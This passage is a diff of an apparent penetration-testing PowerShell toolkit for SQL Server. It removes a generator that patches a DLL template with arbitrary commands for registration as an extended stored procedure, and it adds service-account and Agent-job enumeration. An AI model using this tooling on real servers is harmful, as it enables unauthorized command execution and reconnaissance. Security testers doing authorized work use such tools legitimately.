AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnIHN0YW5kYWxvbmU9J3llcyc/Pg0KPGFzc2VtYmx5IHhtbG5zPSd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MScgbWFuaWZlc3RWZXJzaW9uPScxLjAnPg0KICA8dHJ1c3RJbmZvIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0nYXNJbnZva2VyJyB1aUFjY2Vzcz0nZmFsc2UnIC8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5Pg0KAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAQAgAAAAIK4orjCuOK5AriivMK84r0CvSK9QrwAAAMABABQAAABYqGCoCKkgqSipeK0A0AEADAAAAKigAAAAQAIADAAAAACgEKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - - # Convert it to a byte array - [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64) + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - # This is the string in the DLL template that will need to be replaced - $BufferString = 'REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!' + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, - # ----------------------------------------------- - # Setup command - # ----------------------------------------------- + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) - # Command to injectin into the DLL (if not defined by the user) - IF(-not($Command)) + Begin { - $CommandString = 'echo This is a test. > c:\temp\test.txt && REM' + # Table for output + $TblServiceAccount = New-Object -TypeName System.Data.DataTable } - else + + Process { - $CommandString = "$Command && REM" - } + # Note: Tables queried by this function typically require sysadmin privileges. - # Calculate the length of the BufferString - $BufferStringLen = $BufferString.Length + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Calculate the length of the Command - $CommandStringLen = $CommandString.Length + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - # Check if the command is to long to be accepted by cmd.exe used by the system call - if ($CommandStringLen -gt $BufferStringLen) - { - Write-Warning -Message ' Command is too long!' - Break - } - else - { - $BuffLenDiff = $BufferStringLen - $CommandStringLen - $NewBuffer = ' ' * $BuffLenDiff - $CommandString = "$CommandString && REM $NewBuffer" - } + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } - # Convert command string - $CommandStringBytes = ([system.Text.Encoding]::UTF8).GetBytes($CommandString) + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # Get string value of the DLL file - $S = [System.Text.Encoding]::ASCII.GetString($DllBytes) + if($IsSysadmin -eq 'Yes') + { + $SysadminSetup = " + -- Get SQL Server Browser - Static Location + EXECUTE master.dbo.xp_instance_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Services\SQLBrowser', + @value_name = N'ObjectName', + @value = @BrowserLogin OUTPUT - # Set the offset to 0 - $Index = 0 + -- Get SQL Server Writer - Static Location + EXECUTE master.dbo.xp_instance_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Services\SQLWriter', + @value_name = N'ObjectName', + @value = @WriterLogin OUTPUT - # Get the starting offset of the buffer string - $Index = $S.IndexOf($BufferString) + -- Get MSOLAP - Calculated + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @MSOLAPInstance, + N'ObjectName',@AnalysisLogin OUTPUT - if(($Index -eq 0) -and ($Index -ne -1)) - { - throw("Could not find string $BufferString !") - Break - } - else - { - Write-Verbose -Message " Found buffer offset for command: $Index" - } + -- Get Reporting - Calculated + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @ReportInstance, + N'ObjectName',@ReportLogin OUTPUT - # Replace target bytes - for ($i = 0; $i -lt $CommandStringBytes.Length; $i++) - { - $DllBytes[$Index+$i] = $CommandStringBytes[$i] - } + -- Get SQL Server DTS Server / Analysis - Calulated + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @IntegrationVersion, + N'ObjectName',@IntegrationDtsLogin OUTPUT" - # ----------------------------------------------- - # Setup proc / dll function export name - # ----------------------------------------------- - $ProcNameBuffer = 'EVILEVILEVILEVILEVIL' + $SysadminQuery = ' ,[BrowserLogin] = @BrowserLogin, + [WriterLogin] = @WriterLogin, + [AnalysisLogin] = @AnalysisLogin, + [ReportLogin] = @ReportLogin, + [IntegrationLogin] = @IntegrationDtsLogin' + } + else + { + $SysadminSetup = '' + $SysadminQuery = '' + } - # Set default dll name - IF(-not($ExportName)) - { - $ExportName = 'xp_evil' - } - - # Check function name length - $ProcNameBufferLen = $ProcNameBuffer.Length - $ExportNameLen = $ExportName.Length - If ($ProcNameBufferLen -lt $ExportNameLen) - { - Write-Warning -Message ' The function name is too long!' - Break - } - else - { - $ProcBuffLenDiff = $ProcNameBufferLen - $ExportNameLen - $ProcNewBuffer = '' * $ProcBuffLenDiff - #$ExportName = "$ExportName$ProcNewBuffer" # need to write nullbytes - } - - # Get function name string offset - $ProcIndex = 0 + # Define Query + $Query = " -- Setup variables + DECLARE @SQLServerInstance VARCHAR(250) + DECLARE @MSOLAPInstance VARCHAR(250) + DECLARE @ReportInstance VARCHAR(250) + DECLARE @AgentInstance VARCHAR(250) + DECLARE @IntegrationVersion VARCHAR(250) + DECLARE @DBEngineLogin VARCHAR(100) + DECLARE @AgentLogin VARCHAR(100) + DECLARE @BrowserLogin VARCHAR(100) + DECLARE @WriterLogin VARCHAR(100) + DECLARE @AnalysisLogin VARCHAR(100) + DECLARE @ReportLogin VARCHAR(100) + DECLARE @IntegrationDtsLogin VARCHAR(100) - # Get string value of the DLL file - $S2 = [System.Text.Encoding]::ASCII.GetString($DllBytes) + -- Get Service Paths for default and name instance + if @@SERVICENAME = 'MSSQLSERVER' or @@SERVICENAME = HOST_NAME() + BEGIN + -- Default instance paths + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLServerOLAPService' + set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer' + set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT' + set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' + END + ELSE + BEGIN + -- Named instance paths + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$' + cast(@@SERVICENAME as varchar(250)) + set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSOLAP$' + cast(@@SERVICENAME as varchar(250)) + set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer$' + cast(@@SERVICENAME as varchar(250)) + set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLAgent$' + cast(@@SERVICENAME as varchar(250)) + set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' + END - $ProcIndex = $S2.IndexOf($ProcNameBuffer) + -- Get SQL Server - Calculated + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@DBEngineLogin OUTPUT - # Check for offset errors - if(($ProcIndex -eq 0) -and ($ProcIndex -ne -1)) - { - throw("Could not find string $ProcNameBuffer!") - Break - } - else - { - Write-Verbose -Message " Found buffer offset for function name: $ProcIndex" - } + -- Get SQL Server Agent - Calculated + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @AgentInstance, + N'ObjectName',@AgentLogin OUTPUT - # Convert function name to bytes - $ExportNameBytes = ([system.Text.Encoding]::UTF8).GetBytes($ExportName) + $SysadminSetup - # Replace target bytes - for ($i = 0; $i -lt $ExportNameBytes.Length; $i++) - { - $DllBytes[$ProcIndex+$i] = $ExportNameBytes[$i] - } + -- Dislpay results + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + [DBEngineLogin] = @DBEngineLogin, + [AgentLogin] = @AgentLogin + $SysadminQuery" - # Get offset for nulls - $NullOffset = $ProcIndex+$ExportNameLen - Write-Verbose -Message " Found buffer offset for buffer: $NullOffset" - $NullBytes = ([system.Text.Encoding]::UTF8).GetBytes($ProcNewBuffer) + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Replace target bytes - for ($i = 0; $i -lt $ProcBuffLenDiff; $i++) - { - $DllBytes[$NullOffset+$i] = $NullBytes[$i] + # Append results + $TblServiceAccount = $TblServiceAccount + $TblResults } - # ------------------------------------ - # Write DLL file to disk - # ------------------------------------ - - IF(-not($OutFile)) + End { - $OutFile = '.\evil64.dll' + # Return data + # $TblServiceAccount + + # Create new table + $TblNewObject = New-Object -TypeName System.Data.DataTable + $null = $TblNewObject.Columns.Add("ComputerName") + $null = $TblNewObject.Columns.Add("Instance") + $null = $TblNewObject.Columns.Add("ServiceType") + $null = $TblNewObject.Columns.Add("ServiceAccount") + + # Add rows + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"AgentService",$TblServiceAccount.AgentLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"AnalysisService",$TblServiceAccount.AnalysisLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"BrowserService",$TblServiceAccount.BrowserLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"SQLService",$TblServiceAccount.DBEngineLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"IntegrationService",$TblServiceAccount.IntegrationLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"ReportService",$TblServiceAccount.ReportLogin) + $TblNewObject.Rows.Add($TblServiceAccount.ComputerName,$TblServiceAccount.Instance,"WriterService",$TblServiceAccount.WriterLogin) + $TblNewObject } - - Write-Verbose -Message "Creating DLL $OutFile" - Write-Verbose -Message " - Exported function name: $ExportName" - Write-Verbose -Message " - Exported function command: `"$Command`"" - Write-Verbose -Message " - Manual test: rundll32 $OutFile,$ExportName" - Set-Content -Value $DllBytes -Encoding Byte -Path $OutFile - Write-Verbose -Message ' - DLL written' - - Write-Verbose -Message ' ' - Write-Verbose -Message 'SQL Server Notes' - Write-Verbose -Message 'The exported function can be registered as a SQL Server extended stored procedure. Options below:' - Write-Verbose -Message " - Register xp via local disk: sp_addextendedproc `'$ExportName`', 'c:\temp\myxp.dll'" - Write-Verbose -Message " - Register xp via UNC path: sp_addextendedproc `'$ExportName`', `'\\servername\pathtofile\myxp.dll`'" - Write-Verbose -Message " - Unregister xp: sp_dropextendedproc `'$ExportName`'" } -#endregion - -######################################################################### -# -#region DISCOVERY FUNCTIONS -# -######################################################################### -# ------------------------------------------- -# Function: Get-DomainSpn -# ------------------------------------------- -# Author: Scott Sutherland -# Reference: http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx -function Get-DomainSpn +# ---------------------------------- +# Get-SQLAgentJob +# ---------------------------------- +# Author: Leo Loobeek and Scott Sutherland +Function Get-SQLAgentJob { <# .SYNOPSIS - Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system - Note: This will use the default logon server by default. + This function will check the current login's privileges and return a list + of the jobs they have privileges to view. .PARAMETER Username - Domain account to authenticate to Active Directory. + SQL Server or domain account to authenticate with. .PARAMETER Password - Domain password to authenticate to Active Directory. + SQL Server or domain account password to authenticate with. .PARAMETER Credential - Domain credential to authenticate to Active Directory. - .PARAMETER DomainController - Domain controller to authenticated to. Requires username/password or credential. - .PARAMETER ComputerName - Computer name to filter for. - .PARAMETER DomainAccount - Domain account to filter for. - .PARAMETER SpnService - SPN service code to filter for. - .EXAMPLE - PS C:\temp> Get-DomainSpn -SpnService MSSQL | Select-Object -First 2 - - UserSid : 15000005210002431346712321821222048886811922073100 - User : SQLServer1$ - UserCn : SQLServer1 - Service : MSSQLSvc - ComputerName : SQLServer1.domain.local - Spn : MSSQLSvc/SQLServer1.domain.local:1433 - LastLogon : 6/24/2016 6:56 AM - Description : This is a SQL Server test instance using a local managed service account. - - UserSid : 15000005210002431346712321821222048886811922073101 - User : SQLServiceAccount - UserCn : SQLServiceAccount - Service : MSSQLSvc - ComputerName : SQLServer2.domain.local - Spn : MSSQLSvc/SQLServer2.domain.local:NamedInstance - LastLogon : 3/26/2016 3:43 PM - Description : This is a SQL Server test instance using a domain service account. + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER ProxyCredential + Only return SQL Agent jobs using a specific proxy credential. + .PARAMETER UsingProxyCredential + Only return SQL Agent jobs using a proxy credentials. + .PARAMETER SubSystem + Only return SQL Agent jobs for specific subsystems. + .PARAMETER Keyword + Only return SQL Agent jobs that have a command that includes a specific keyword. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. .EXAMPLE - PS C:\temp> Get-DomainSpn -DomainController 10.0.0.1 -Username Domain\User -Password Password123! + PS C:\> Get-SQLInstanceLocal | Get-SQLAgentJob -Verbose -Username sa -Password 'Password123!' | select Instance, Job_name, Step_name, SubSystem, Command | ft + VERBOSE: SQL Server Agent Job Search Starting... + VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Failed. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: 